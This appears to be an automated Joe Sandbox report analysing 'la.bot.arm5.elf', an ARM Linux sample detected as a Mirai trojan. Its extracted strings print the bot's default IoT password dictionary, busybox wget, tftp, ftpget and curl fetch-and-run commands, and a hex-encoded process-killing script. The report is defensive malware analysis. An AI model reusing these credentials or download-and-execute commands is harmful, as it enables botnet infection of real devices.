Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
la.bot.arm5.elf

Overview

General Information

Sample name:la.bot.arm5.elf
Analysis ID:1560228
MD5:1bc359da7da37f8509a38a3a53a248a8
SHA1:eda2b634c1f48f9840b46e29a681af70c688a608
SHA256:5c87c92b8c601eae45bdbbb63b30fbed2c7f4c094a0ab4780e90d2c938c78d43
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1560228
Start date and time:2024-11-21 15:17:16 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:la.bot.arm5.elf
Detection:MAL
Classification:mal48.linELF@0/0@2/0
  • VT rate limit hit for: la.bot.arm5.elf
Command:/tmp/la.bot.arm5.elf
PID:5423
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • la.bot.arm5.elf (PID: 5423, Parent: 5346, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/la.bot.arm5.elf
  • dash New Fork (PID: 5452, Parent: 3580)
  • rm (PID: 5452, Parent: 3580, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XbXsBy4fsU /tmp/tmp.w38YgFUlMq /tmp/tmp.stuAWr8jHa
  • dash New Fork (PID: 5453, Parent: 3580)
  • cat (PID: 5453, Parent: 3580, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.XbXsBy4fsU
  • dash New Fork (PID: 5454, Parent: 3580)
  • head (PID: 5454, Parent: 3580, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5455, Parent: 3580)
  • tr (PID: 5455, Parent: 3580, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5456, Parent: 3580)
  • cut (PID: 5456, Parent: 3580, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5457, Parent: 3580)
  • cat (PID: 5457, Parent: 3580, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.XbXsBy4fsU
  • dash New Fork (PID: 5458, Parent: 3580)
  • head (PID: 5458, Parent: 3580, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5459, Parent: 3580)
  • tr (PID: 5459, Parent: 3580, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5460, Parent: 3580)
  • cut (PID: 5460, Parent: 3580, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5463, Parent: 3580)
  • rm (PID: 5463, Parent: 3580, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XbXsBy4fsU /tmp/tmp.w38YgFUlMq /tmp/tmp.stuAWr8jHa
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: la.bot.arm5.elfReversingLabs: Detection: 31%
Source: unknownHTTPS traffic detected: 34.243.160.129:443 -> 192.168.2.13:50528 version: TLS 1.2
Source: la.bot.arm5.elfString: ash|login|wget|curl|tftp|ntpdate|ftp
Source: la.bot.arm5.elfString: /proc/self/exe/. /proc//proc//exe|ash|login|wget|curl|tftp|ntpdate|ftp/lib//lib64//mountinfo/fd/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin/
Source: la.bot.arm5.elfString: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
Source: /tmp/la.bot.arm5.elf (PID: 5423)Socket: 127.0.0.1:1234Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 34.243.160.129
Source: unknownTCP traffic detected without corresponding DNS query: 34.243.160.129
Source: unknownTCP traffic detected without corresponding DNS query: 34.243.160.129
Source: unknownTCP traffic detected without corresponding DNS query: 34.243.160.129
Source: unknownTCP traffic detected without corresponding DNS query: 34.243.160.129
Source: unknownTCP traffic detected without corresponding DNS query: 34.243.160.129
Source: unknownTCP traffic detected without corresponding DNS query: 34.243.160.129
Source: unknownTCP traffic detected without corresponding DNS query: 34.243.160.129
Source: unknownTCP traffic detected without corresponding DNS query: 34.243.160.129
Source: unknownTCP traffic detected without corresponding DNS query: 34.243.160.129
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: la.bot.arm5.elfString found in binary or memory: http:///curl.sh
Source: la.bot.arm5.elfString found in binary or memory: http:///wget.sh
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50528
Source: unknownNetwork traffic detected: HTTP traffic on port 50528 -> 443
Source: unknownHTTPS traffic detected: 34.243.160.129:443 -> 192.168.2.13:50528 version: TLS 1.2
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sampleString containing 'busybox' found: usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sampleString containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/0@2/0
Source: /usr/bin/dash (PID: 5452)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XbXsBy4fsU /tmp/tmp.w38YgFUlMq /tmp/tmp.stuAWr8jHaJump to behavior
Source: /usr/bin/dash (PID: 5463)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XbXsBy4fsU /tmp/tmp.w38YgFUlMq /tmp/tmp.stuAWr8jHaJump to behavior
Source: /tmp/la.bot.arm5.elf (PID: 5423)Queries kernel information via 'uname': Jump to behavior
Source: la.bot.arm5.elf, 5423.1.00007fff38e1f000.00007fff38e40000.rw-.sdmpBinary or memory string: :x86_64/usr/bin/qemu-arm/tmp/la.bot.arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.arm5.elf
Source: la.bot.arm5.elf, 5423.1.0000560ba15d7000.0000560ba1725000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: la.bot.arm5.elf, 5423.1.0000560ba15d7000.0000560ba1725000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
Source: la.bot.arm5.elf, 5423.1.00007fff38e1f000.00007fff38e40000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: la.bot.arm5.elf, 5423.1.00007fff38e1f000.00007fff38e40000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path Interception1
File Deletion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560228 Sample: la.bot.arm5.elf Startdate: 21/11/2024 Architecture: LINUX Score: 48 14 34.243.160.129, 443, 50528 AMAZON-02US United States 2->14 16 daisy.ubuntu.com 2->16 18 Multi AV Scanner detection for submitted file 2->18 6 dash rm 2->6         started        8 dash head 2->8         started        10 dash tr 2->10         started        12 8 other processes 2->12 signatures3 process4

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
la.bot.arm5.elf32%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http:///wget.shla.bot.arm5.elffalse
      high
      http:///curl.shla.bot.arm5.elffalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        34.243.160.129
        unknownUnited States
        16509AMAZON-02USfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        34.243.160.129jwwofba5.elfGet hashmaliciousMiraiBrowse
          qkehusl.elfGet hashmaliciousMiraiBrowse
            x-8.6-.ISIS.elfGet hashmaliciousGafgytBrowse
              main_mpsl.elfGet hashmaliciousUnknownBrowse
                SecuriteInfo.com.Trojan.Linux.GenericKD.28459.8905.27219.elfGet hashmaliciousUnknownBrowse
                  arm.elfGet hashmaliciousUnknownBrowse
                    nPRmTlXhOT.elfGet hashmaliciousUnknownBrowse
                      main_arm.elfGet hashmaliciousMiraiBrowse
                        na.elfGet hashmaliciousGafgyt, MiraiBrowse
                          hidakibest.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            daisy.ubuntu.comla.bot.arm.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.25
                            la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.24
                            la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.24
                            la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.25
                            la.bot.mips.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.25
                            7kM7p7yctU.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.24
                            la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.24
                            ztTMIDbMik.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.24
                            dlr.sh4.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.25
                            PFbDNJwjDC.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.24
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            AMAZON-02UShttps://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                            • 18.200.123.41
                            dvLKUpkeV8.elfGet hashmaliciousUnknownBrowse
                            • 54.171.230.55
                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                            • 13.248.176.92
                            https://url.uk.m.mimecastprotect.com/s/1u4eCqxlyukZk7ltZfxHE-ELz?domain=andy-25.simvoly.comGet hashmaliciousHTMLPhisherBrowse
                            • 18.245.31.108
                            https://cardpayment.microransom.us/XYmdKR004c2prdTQ3eFRYdTZlUlAwSGhsclU2V3JnMWpuZ2h3Njg2emV0U3ZLY1Z4RkpNZm9HbkpHck9SNjFHb01Yem5jSDVSb2RmaXRIWUNvN2g1UHR4NlNzM05yeWg0R2VJSzhzSFlRVTN6UFZHYWpZSUxBeXpsYmtPMjFua1J5RFlLdm5OUVBGRnl2UWRxSjhpUFRwL1VXS1RqNEJjMmJwNkVPOVkvV2o3S3R0MkYzS1VXOG5uS1hHVll2eDdUb3hmcGtBb2VBTUdHc3hweEtXV25WRVZKdDBwWCtVZGtobzFsamp3PS0tYVREdUlIcWNwNFJ5RjAxci0tQWs2bGpCejYzaGsxMWJqSll4TWFNQT09?cid=293298779Get hashmaliciousKnowBe4Browse
                            • 52.214.139.140
                            +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                            • 13.32.121.48
                            https://rebrand.ly/gs02u8aGet hashmaliciousUnknownBrowse
                            • 76.76.21.98
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • 13.32.99.21
                            https://login.shipping-notification.info/3a7a053e93beffea?l=56Get hashmaliciousUnknownBrowse
                            • 54.246.131.245
                            No context
                            No context
                            No created / dropped files found
                            File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                            Entropy (8bit):6.056729849460532
                            TrID:
                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                            File name:la.bot.arm5.elf
                            File size:73'316 bytes
                            MD5:1bc359da7da37f8509a38a3a53a248a8
                            SHA1:eda2b634c1f48f9840b46e29a681af70c688a608
                            SHA256:5c87c92b8c601eae45bdbbb63b30fbed2c7f4c094a0ab4780e90d2c938c78d43
                            SHA512:6809a8f50f45e65d925248714598da9eab382c0b53b6a5098a924e486dd3348c01511bb5ecf5464584873dfe4031fe5588c84d59d259f3b27f9064002d4d3aa1
                            SSDEEP:1536:F1Tz04PCs5OYhHInPx1OTk+yIrYhC8fkIb3H9x5rQQzsIcxqnzsTt:rLPCsVHInDOThyIrM9b3dx5kQzs7xqny
                            TLSH:73630985B892DA67C6D546BBFE0F82CD372563D8E3DE3213CE14AF50368B85B096B141
                            File Content Preview:.ELF...a..........(.........4...........4. ...(.....................4...4...............8...8...8...\....E..........Q.td..................................-...L."...U>..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                            ELF header

                            Class:ELF32
                            Data:2's complement, little endian
                            Version:1 (current)
                            Machine:ARM
                            Version Number:0x1
                            Type:EXEC (Executable file)
                            OS/ABI:ARM - ABI
                            ABI Version:0
                            Entry Point Address:0x8190
                            Flags:0x2
                            ELF Header Size:52
                            Program Header Offset:52
                            Program Header Size:32
                            Number of Program Headers:3
                            Section Header Offset:72916
                            Section Header Size:40
                            Number of Section Headers:10
                            Header String Table Index:9
                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                            NULL0x00x00x00x00x0000
                            .initPROGBITS0x80940x940x180x00x6AX004
                            .textPROGBITS0x80b00xb00xf98c0x00x6AX0016
                            .finiPROGBITS0x17a3c0xfa3c0x140x00x6AX004
                            .rodataPROGBITS0x17a500xfa500x1ee40x00x2A004
                            .ctorsPROGBITS0x219380x119380x80x00x3WA004
                            .dtorsPROGBITS0x219400x119400x80x00x3WA004
                            .dataPROGBITS0x2194c0x1194c0x3480x00x3WA004
                            .bssNOBITS0x21c940x11c940x42900x00x3WA004
                            .shstrtabSTRTAB0x00x11c940x3e0x00x0001
                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                            LOAD0x00x80000x80000x119340x119346.07840x5R E0x8000.init .text .fini .rodata
                            LOAD0x119380x219380x219380x35c0x45ec3.77160x6RW 0x8000.ctors .dtors .data .bss
                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 21, 2024 15:18:04.831512928 CET4435052834.243.160.129192.168.2.13
                            Nov 21, 2024 15:18:04.831542969 CET4435052834.243.160.129192.168.2.13
                            Nov 21, 2024 15:18:04.831562996 CET4435052834.243.160.129192.168.2.13
                            Nov 21, 2024 15:18:04.831577063 CET50528443192.168.2.1334.243.160.129
                            Nov 21, 2024 15:18:04.831577063 CET50528443192.168.2.1334.243.160.129
                            Nov 21, 2024 15:18:04.831753016 CET50528443192.168.2.1334.243.160.129
                            Nov 21, 2024 15:18:05.041903019 CET4435052834.243.160.129192.168.2.13
                            Nov 21, 2024 15:18:05.041961908 CET50528443192.168.2.1334.243.160.129
                            Nov 21, 2024 15:18:05.042387962 CET50528443192.168.2.1334.243.160.129
                            Nov 21, 2024 15:18:05.161974907 CET4435052834.243.160.129192.168.2.13
                            Nov 21, 2024 15:18:05.470174074 CET4435052834.243.160.129192.168.2.13
                            Nov 21, 2024 15:18:05.470236063 CET50528443192.168.2.1334.243.160.129
                            Nov 21, 2024 15:18:05.470371008 CET50528443192.168.2.1334.243.160.129
                            Nov 21, 2024 15:18:05.589993000 CET4435052834.243.160.129192.168.2.13
                            Nov 21, 2024 15:18:05.906883001 CET4435052834.243.160.129192.168.2.13
                            Nov 21, 2024 15:18:05.906939030 CET50528443192.168.2.1334.243.160.129
                            Nov 21, 2024 15:18:05.908030033 CET50528443192.168.2.1334.243.160.129
                            Nov 21, 2024 15:18:06.032181978 CET4435052834.243.160.129192.168.2.13
                            Nov 21, 2024 15:18:06.032267094 CET50528443192.168.2.1334.243.160.129
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 21, 2024 15:18:05.669256926 CET5353853192.168.2.131.1.1.1
                            Nov 21, 2024 15:18:05.669303894 CET5126553192.168.2.131.1.1.1
                            Nov 21, 2024 15:18:05.903112888 CET53512651.1.1.1192.168.2.13
                            Nov 21, 2024 15:18:05.903640985 CET53535381.1.1.1192.168.2.13
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Nov 21, 2024 15:18:05.669256926 CET192.168.2.131.1.1.10x77f1Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                            Nov 21, 2024 15:18:05.669303894 CET192.168.2.131.1.1.10x989aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 21, 2024 15:18:05.903640985 CET1.1.1.1192.168.2.130x77f1No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                            Nov 21, 2024 15:18:05.903640985 CET1.1.1.1192.168.2.130x77f1No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                            Nov 21, 2024 15:18:04.831562996 CET34.243.160.129443192.168.2.1350528CN=motd.ubuntu.com CN=R11, O=Let's Encrypt, C=USCN=R11, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USMon Oct 21 10:21:37 CEST 2024 Wed Mar 13 01:00:00 CET 2024Sun Jan 19 09:21:36 CET 2025 Sat Mar 13 00:59:59 CET 2027
                            CN=R11, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027

                            System Behavior

                            Start time (UTC):14:18:03
                            Start date (UTC):21/11/2024
                            Path:/tmp/la.bot.arm5.elf
                            Arguments:/tmp/la.bot.arm5.elf
                            File size:4956856 bytes
                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/rm
                            Arguments:rm -f /tmp/tmp.XbXsBy4fsU /tmp/tmp.w38YgFUlMq /tmp/tmp.stuAWr8jHa
                            File size:72056 bytes
                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/cat
                            Arguments:cat /tmp/tmp.XbXsBy4fsU
                            File size:43416 bytes
                            MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/head
                            Arguments:head -n 10
                            File size:47480 bytes
                            MD5 hash:fd96a67145172477dd57131396fc9608

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/tr
                            Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                            File size:51544 bytes
                            MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/cut
                            Arguments:cut -c -80
                            File size:47480 bytes
                            MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/cat
                            Arguments:cat /tmp/tmp.XbXsBy4fsU
                            File size:43416 bytes
                            MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/head
                            Arguments:head -n 10
                            File size:47480 bytes
                            MD5 hash:fd96a67145172477dd57131396fc9608

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/tr
                            Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                            File size:51544 bytes
